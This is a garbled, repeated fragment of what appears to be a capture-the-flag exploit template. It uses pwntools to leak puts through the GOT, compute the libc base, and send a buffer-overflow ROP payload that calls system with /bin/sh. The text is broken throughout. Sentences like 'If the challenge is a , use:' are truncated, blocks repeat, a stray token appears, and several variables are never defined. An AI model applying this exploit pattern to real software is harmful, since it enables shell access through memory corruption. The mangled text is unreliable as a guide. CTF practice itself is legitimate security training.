If the challenge is a , use:
# ---- Step 1: Leak an address (example: puts@GLIBC) ----------------- offset = <offset_to_ret> puts_plt = ELF.plt['puts'] puts_got = ELF.got['puts'] main_addr = ELF.symbols['main'] hunta-694
# ---- Step 2: Compute libc base ------------------------------------ libc = ELF('<path_to_libc.so.6>') # provided or from system libc.address = leaked_puts - libc.symbols['puts'] log.info(f'Libc base: hex(libc.address)') If the challenge is a , use: #
rop_payload = flat( b'A' * offset, pop_rdi, bin_sh, system ) io.sendlineafter(b'> ', rop_payload) If the challenge is a
If the challenge is a , use:
# ---- Step 1: Leak an address (example: puts@GLIBC) ----------------- offset = <offset_to_ret> puts_plt = ELF.plt['puts'] puts_got = ELF.got['puts'] main_addr = ELF.symbols['main']
# ---- Step 2: Compute libc base ------------------------------------ libc = ELF('<path_to_libc.so.6>') # provided or from system libc.address = leaked_puts - libc.symbols['puts'] log.info(f'Libc base: hex(libc.address)')
rop_payload = flat( b'A' * offset, pop_rdi, bin_sh, system ) io.sendlineafter(b'> ', rop_payload)